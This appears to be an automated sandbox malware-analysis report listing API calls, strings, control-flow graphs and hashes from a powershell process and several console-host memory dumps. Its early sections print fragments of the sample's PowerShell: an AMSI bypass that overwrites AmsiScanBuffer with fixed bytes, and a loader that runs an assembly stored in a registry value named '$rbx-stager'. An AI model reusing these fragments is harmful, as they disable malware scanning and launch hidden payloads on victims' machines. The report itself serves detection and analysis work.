                                                                                                                                                          • CryptGenRandom.ADVAPI32(00401A2F,00004000,00000000,?,00401A2F), ref: 0040102D
                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00401A2F,00000000,?,00401A2F), ref: 00401039
                                                                                                                                                          Strings
                                                                                                                                                          • Microsoft Base Cryptographic Provider v1.0, xrefs: 0040100E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000038.00000002.1927784010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_56_2_400000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                          • String ID: Microsoft Base Cryptographic Provider v1.0
                                                                                                                                                          • API String ID: 1815803762-291530887
                                                                                                                                                          • Opcode ID: 7b900a4f350d734c292f5c1c4b13f0c1982cf59fedc7216eb164ff64d53fea36
                                                                                                                                                          • Instruction ID: b3acd7e835805075c9d1b27062e8bfe6e8ad1c0e86411dcbfca9405e651f33df
                                                                                                                                                          • Opcode Fuzzy Hash: 7b900a4f350d734c292f5c1c4b13f0c1982cf59fedc7216eb164ff64d53fea36
                                                                                                                                                          • Instruction Fuzzy Hash: C9E0E5726002247BEB304B959E8DF8B3A6CDB80654F200036B704F2190D5B08D00D268

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00008000,00000000,00000000,00000000,00401827,?,?,?,?,?,0040179D), ref: 00401872
                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 00401879
                                                                                                                                                          • StrCpyW.SHLWAPI(00000000,00402238), ref: 00401888
                                                                                                                                                          • StrCatW.SHLWAPI(00000000,function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]), ref: 004018A3
                                                                                                                                                            • Part of subcall function 0040112F: GetCurrentProcess.KERNEL32(?,00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 0040113D
                                                                                                                                                            • Part of subcall function 0040112F: IsWow64Process.KERNEL32(00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 00401144
                                                                                                                                                          • StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);), ref: 004018BB
                                                                                                                                                          • StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe), ref: 004018C3
                                                                                                                                                          • StrCatW.SHLWAPI(00000000,[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$rbx-stager`)).EntryPoint.In), ref: 004018CB
                                                                                                                                                          • StrCatW.SHLWAPI(00000000,00402238), ref: 004018CF
                                                                                                                                                          Strings
                                                                                                                                                          • LoadLibraryDelegate, xrefs: 00401920
                                                                                                                                                          • AmsiScanBufferPtr, xrefs: 00401968
                                                                                                                                                          • [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe, xrefs: 004018BD
                                                                                                                                                          • Kernel32Ptr, xrefs: 00401938
                                                                                                                                                          • TypeBuilder, xrefs: 004018FC
                                                                                                                                                          • OldProtect, xrefs: 00401974
                                                                                                                                                          • GetProcAddress, xrefs: 00401914
                                                                                                                                                          • LoadLibraryPtr, xrefs: 00401944
                                                                                                                                                          • VirtualProtectPtr, xrefs: 00401950
                                                                                                                                                          • [Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);, xrefs: 004018AE
                                                                                                                                                          • AmsiPtr, xrefs: 0040195C
                                                                                                                                                          • VirtualProtectDelegate, xrefs: 0040192C
                                                                                                                                                          • Get-Delegate, xrefs: 004018D8
                                                                                                                                                          • NativeMethods, xrefs: 00401908
                                                                                                                                                          • [Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$rbx-stager`)).EntryPoint.In, xrefs: 004018C5
                                                                                                                                                          • ReturnType, xrefs: 004018F0
                                                                                                                                                          • function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type], xrefs: 0040189D
                                                                                                                                                          • [Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);, xrefs: 004018B5
                                                                                                                                                          • ParameterTypes, xrefs: 004018E4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000038.00000002.1927784010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_56_2_400000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$Heap$AllocCurrentWow64
                                                                                                                                                          • String ID: AmsiPtr$AmsiScanBufferPtr$Get-Delegate$GetProcAddress$Kernel32Ptr$LoadLibraryDelegate$LoadLibraryPtr$NativeMethods$OldProtect$ParameterTypes$ReturnType$TypeBuilder$VirtualProtectDelegate$VirtualProtectPtr$[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$rbx-stager`)).EntryPoint.In$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);$[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe$function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]
                                                                                                                                                          • API String ID: 2666690646-646820343
                                                                                                                                                          • Opcode ID: 3f5c978e97a954265763d819c8a7a71c785032f2f8244d135faac9b6795907b0
                                                                                                                                                          • Instruction ID: f846a874a752e31dd56dc30a4e6b8ff2ba80a14d39c5350a1e27bccbc54df91f
                                                                                                                                                          • Opcode Fuzzy Hash: 3f5c978e97a954265763d819c8a7a71c785032f2f8244d135faac9b6795907b0
                                                                                                                                                          • Instruction Fuzzy Hash: 6D219D9030292067D5163A621A6A92F980E8BC1B46710C03FB9457F7E9DF7D8F038BDE

                                                                                                                                                          Control-flow Graph
                                                                                                                                                          control_flow_graph 133 40151a-401547 SysAllocString * 2 CoInitializeEx 134 40154d-401561 CoInitializeSecurity 133->134 135 40165f-401673 SysFreeString * 2 133->135 136 401563-401568 134->136 137 40156e-40158a CoCreateInstance 134->137 136->137 139 401659 CoUninitialize 136->139 138 401590-4015d5 VariantInit 137->138 137->139 141 4015d7-4015ec 138->141 142 40164d-401656 138->142 139->135 141->142 145 4015ee-401603 141->145 142->139 147 401644-401648 145->147 148 401605-401627 VariantInit 145->148 147->142 149 40162b-40162d 148->149 150 40163b-40163f 149->150 151 40162f-401636 149->151 150->147 151->150
                                                                                                                                                          APIs
                                                                                                                                                          • SysAllocString.OLEAUT32($rbx-svc64), ref: 0040152C
                                                                                                                                                          • SysAllocString.OLEAUT32(0040218C), ref: 00401538
                                                                                                                                                          • CoInitializeEx.OLE32(00000000,00000000), ref: 0040153F
                                                                                                                                                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401559
                                                                                                                                                          • CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 00401582
                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 00401594
                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 00401609
                                                                                                                                                          • CoUninitialize.COMBASE ref: 00401659
                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00401666
                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 0040166B
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000038.00000002.1927784010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_56_2_400000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: String$AllocFreeInitInitializeVariant$CreateInstanceSecurityUninitialize
                                                                                                                                                          • String ID: $rbx-svc32$$rbx-svc64
                                                                                                                                                          • API String ID: 2407135876-384997928
                                                                                                                                                          • Opcode ID: 7425de0db50bf038e31b53769003f6f27261718ef458d0c48b03b975902a686c
                                                                                                                                                          • Instruction ID: a7557972db62563d574e16152cd358301487189799b80a26eca7dc015dd46a94
                                                                                                                                                          • Opcode Fuzzy Hash: 7425de0db50bf038e31b53769003f6f27261718ef458d0c48b03b975902a686c
                                                                                                                                                          • Instruction Fuzzy Hash: FE414471E00219AFDB01EFA4CD899AFBBBDEF49314B140469FA05FB290C6B59D45CB60

                                                                                                                                                          Control-flow Graph
                                                                                                                                                          control_flow_graph 173 401674-4016a1 SysAllocString * 2 CoInitializeEx 174 401782 173->174 175 4016a7-4016bb CoInitializeSecurity 173->175 176 401785-401797 SysFreeString * 2 174->176 177 4016c8-4016e4 CoCreateInstance 175->177 178 4016bd-4016c2 175->178 179 401777 177->179 180 4016ea-401732 VariantInit 177->180 178->177 178->179 181 40177a-401780 CoUninitialize 179->181 183 401734-40174a 180->183 184 401769 180->184 181->176 185 40176c-401775 183->185 187 40174c-401752 183->187 184->185 185->181 189 401757-401767 187->189 189->185
APIs
• SysAllocString.OLEAUT32($rbx-svc32), ref: 00401686
• SysAllocString.OLEAUT32(0040218C), ref: 00401690
• CoInitializeEx.COMBASE(00000000,00000000), ref: 00401699
• CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 004016B3
• CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 004016DC
• VariantInit.OLEAUT32(?), ref: 004016EE
• CoUninitialize.COMBASE ref: 0040177A
• SysFreeString.OLEAUT32(?), ref: 0040178C
• SysFreeString.OLEAUT32(00000000), ref: 0040178F
Memory Dump Source
• Source File: 00000038.00000002.1927784010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_56_2_400000_powershell.jbxd
Similarity
• API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
• String ID: $rbx-svc32
• API String ID: 4184240511-186198907

Control-flow Graph

• Executed
• Not Executed
APIs
• lstrlenW.KERNEL32(Get-Delegate,00000000,00402238), ref: 00401999
• StrStrIW.SHLWAPI(00000000,Get-Delegate), ref: 004019B5
• StrStrIW.SHLWAPI(?,Get-Delegate,775C2EB0), ref: 004019D2
Memory Dump Source
• Source File: 00000038.00000002.1927784010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_56_2_400000_powershell.jbxd
Similarity
• API ID: lstrlen
• String ID: Get-Delegate
• API String ID: 1659193697-1365458365

Control-flow Graph

APIs
  • Part of subcall function 004017A5: FindResourceA.KERNEL32(00000000,00000065,EXE), ref: 004017B5
  • Part of subcall function 004017A5: SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017C8
  • Part of subcall function 004017A5: LoadResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017DA
  • Part of subcall function 004017A5: LockResource.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 004017E5
  • Part of subcall function 004017A5: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE,00000000,000F013F,?,?,?,?,?,?,0040179D), ref: 00401801
  • Part of subcall function 004017A5: RegSetValueExW.KERNELBASE(?,$rbx-stager,00000000,00000003,00000000,00000000,?,?,?,?,?,0040179D), ref: 00401818
• ExitProcess.KERNEL32 ref: 0040179E
Memory Dump Source
• Source File: 00000038.00000002.1927784010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_56_2_400000_powershell.jbxd
Similarity
• API ID: Resource$ExitFindLoadLockOpenProcessSizeofValue
• String ID:
• API String ID: 3836967525-0

Control-flow Graph

APIs
• GetModuleHandleA.KERNEL32(ntdll.dll,00401178,?), ref: 00401193
• GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 004011A3
Memory Dump Source
• Source File: 00000038.00000002.1927784010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_56_2_400000_powershell.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: RtlGetVersion$ntdll.dll
• API String ID: 1646373207-1489217083

Memory Dump Source
• Source File: 0000003A.00000003.2324750513.0000020631820000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000020631820000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_58_3_20631820000_conhost.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0

Memory Dump Source
• Source File: 0000003A.00000003.2324750513.0000020631820000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000020631820000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_58_3_20631820000_conhost.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449

Memory Dump Source
• Source File: 0000003A.00000003.2324750513.0000020631820000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000020631820000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_58_3_20631820000_conhost.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• API String ID: 190073905-0

Memory Dump Source
• Source File: 0000003A.00000003.2324750513.0000020631820000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000020631820000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_58_3_20631820000_conhost.jbxd
Similarity
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
• API String ID: 3896166516-3733052814

Memory Dump Source
• Source File: 0000003A.00000003.2324750513.0000020631820000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000020631820000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_58_3_20631820000_conhost.jbxd
Similarity
• API ID: CurrentImageNonwritable__except_validate_context_record
• String ID: csm
• API String ID: 3242871069-1018135373

Memory Dump Source
• Source File: 0000003A.00000003.2324750513.0000020631820000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000020631820000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_58_3_20631820000_conhost.jbxd
Similarity
• API ID: CallTranslator
• String ID: MOC$RCC
• API String ID: 3163161869-2084237596
                                                                                                                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction ID: b55a240086950b917c3aaeaf00115f5fe75272939ebdbdb30f5c4fae2e402c6c
                                                                                                                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction Fuzzy Hash: 4A61C472904BC485EB728F15E44839AB7A0F795B84F044655EF980BB9ACB7CC1A2CB44
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000045.00000003.2325124553.000001CCE3640000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CCE3640000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_69_3_1cce3640000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                          • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction ID: 0394bb4b47ccd1dab1aad900d5ac66e5868b1cabfa4a73bf77e7c2c2ab0f4a43
                                                                                                                                                          • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction Fuzzy Hash: 1B91E472B4129087EB648F35D500BA9BB99FB55FA8F688124DE4D07798DB34EC62C740
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000045.00000003.2325124553.000001CCE3640000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CCE3640000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_69_3_1cce3640000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                          • API String ID: 849930591-393685449
                                                                                                                                                          • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction ID: 310f30154a6b831172543cc9b5d14f9fc54be49f4af82a2efb80188894200aaf
                                                                                                                                                          • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction Fuzzy Hash: D4D16D32A847808AFB609F75D4447ED7BE8F746BA8F180115EA8D57B96DB34E890C780
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000045.00000003.2325124553.000001CCE3640000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CCE3640000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_69_3_1cce3640000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 190073905-0
                                                                                                                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction ID: da7b0356ea41b841a876a27cc630a5bde62a6ca45d60b74262147c20445c98a1
                                                                                                                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction Fuzzy Hash: AD81C270E802C186FB55AB359841BD92F9DBB87FA0F0C4425E92C4F796DA3AEC4587D0
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000045.00000003.2325124553.000001CCE3640000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CCE3640000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_69_3_1cce3640000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                          • API String ID: 3896166516-3733052814
                                                                                                                                                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction ID: 98184752f1fee0012a167cb42287250bd036c2bfd568ad737ed89e9b65ca81e2
                                                                                                                                                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction Fuzzy Hash: B4516A32A847C09AFBB48F31D144B987BA8F356FA8F184115DA8D47B95CB39EC50CB81
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000045.00000003.2325124553.000001CCE3640000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CCE3640000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_69_3_1cce3640000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                          • String ID: csm
                                                                                                                                                          • API String ID: 3242871069-1018135373
                                                                                                                                                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction ID: 3ed666fcc2d62be28ae2dc06b853063c656d7c2e436bc87a85f73152612311c5
                                                                                                                                                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction Fuzzy Hash: DC51C032B51A808AFB54CB35E444FB93B99F346FA8F198521DA4E43788D77AEC41C780
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000045.00000003.2325124553.000001CCE3640000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CCE3640000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_69_3_1cce3640000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CallTranslator
                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                          • API String ID: 3163161869-2084237596
                                                                                                                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction ID: e9e0c21252a6c97f663ad10f9c8c6e7128998fc4ce508525aab44a6f98bd0a88
                                                                                                                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction Fuzzy Hash: F761A232944BC485E7719F25E440BDABBE4F786BA8F084215EB9C07B99CB7CE590CB40
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000046.00000003.2325509229.000001858EA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001858EA10000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_70_3_1858ea10000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                          • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction ID: 3a3db2866765284e672decd86c76c609f2f3083198cdaeaf91336b1c8496d345
                                                                                                                                                          • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction Fuzzy Hash: CD91487AB0195087EF50AF26D8487BD73A6F746F94F96C0269E4B07788DE34D906D700
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000046.00000003.2325509229.000001858EA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001858EA10000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_70_3_1858ea10000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                          • API String ID: 849930591-393685449
                                                                                                                                                          • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction ID: e40601daf483719f9a7f222e3ecd03bbc0b9ba1efafb41529a14a7cc8b431a12
                                                                                                                                                          • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction Fuzzy Hash: E4D1B432604F4086EB60EF66D8893DD37B6F746B98F908106EE8A67B56DF34C285D701
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000046.00000003.2325509229.000001858EA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001858EA10000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_70_3_1858ea10000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 190073905-0
                                                                                                                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction ID: 7dab81c2846bc0cc14183f81f09c7feb712f76e97a1f120510975bfc35aebbb0
                                                                                                                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction Fuzzy Hash: 82817B31604E4146FB54BB27DC493D922B3EB87F80F94E01BBD4A57796DE38CA86A700
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000046.00000003.2325509229.000001858EA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001858EA10000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_70_3_1858ea10000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                          • API String ID: 3896166516-3733052814
                                                                                                                                                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction ID: a40bc7d8c4837bc198eb0fe0ff068088c266308ea500d1cb8c680ae61df4a6a9
                                                                                                                                                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction Fuzzy Hash: 5B51AE36200B808AEB74AF13994839877F2F356F94F95811BDA9A47B95CF38D650EB01
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000046.00000003.2325509229.000001858EA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001858EA10000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_70_3_1858ea10000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                          • String ID: csm
                                                                                                                                                          • API String ID: 3242871069-1018135373
                                                                                                                                                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction ID: 25d8042df7e59db437b47b2e26b6206b5fa33815c4d34e4678ff3cfb2d5cfb7f
                                                                                                                                                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction Fuzzy Hash: 9151B232311E408AEB55EB16E84CBA833B3E346F98F95C126DA5747788DF78CA81D700
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000046.00000003.2325509229.000001858EA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001858EA10000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_70_3_1858ea10000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CallTranslator
                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                          • API String ID: 3163161869-2084237596
                                                                                                                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction ID: afcaed05c652a5a5b94bc523da64245073e27d53a2fb3ba79b0f48c828c94ee8
                                                                                                                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
